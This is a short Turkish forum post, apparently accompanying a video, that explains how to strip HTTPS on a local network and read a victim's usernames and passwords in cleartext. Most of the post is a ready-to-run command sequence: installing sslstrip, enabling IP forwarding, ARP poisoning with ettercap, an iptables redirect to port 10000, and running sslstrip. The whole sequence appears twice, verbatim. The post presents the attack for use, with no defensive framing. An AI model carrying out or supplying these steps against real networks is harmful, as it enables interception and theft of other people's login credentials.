[FONT=Verdana, Arial, Helvetica, sans-serif]Bu konuda; https protokolünden kriptolu olarak networkten sunuculara gönderilen trafiğin, arasına nasıl girileceği, https gelen trafiğin networkten sniff edilerek kullanıcı adı ve şifreler (videonun 3.25. dakikasında) ile tüm trafiğin kriptosuz olarak nasıl görülebileceği ve http den kurbana gönderilmesi anlatılmaktadır.
İlk olarak sslstripi kuruyoruz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
python ./setup.py install
Saldırı öncesi ayarları yapıyoruz
/proc/sys/net/ipv4/ip_forward
/etc/etter.conf
Saldırıya geçelim
ettercap -Tql eth1 -M arp:remote // //
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
wireshark
sslstrip -a -k -f
[Vimeo=74235223][/FONT]
İlk olarak sslstripi kuruyoruz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
python ./setup.py install
Saldırı öncesi ayarları yapıyoruz
/proc/sys/net/ipv4/ip_forward
/etc/etter.conf
Saldırıya geçelim
ettercap -Tql eth1 -M arp:remote // //
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
wireshark
sslstrip -a -k -f
[Vimeo=74235223][/FONT]
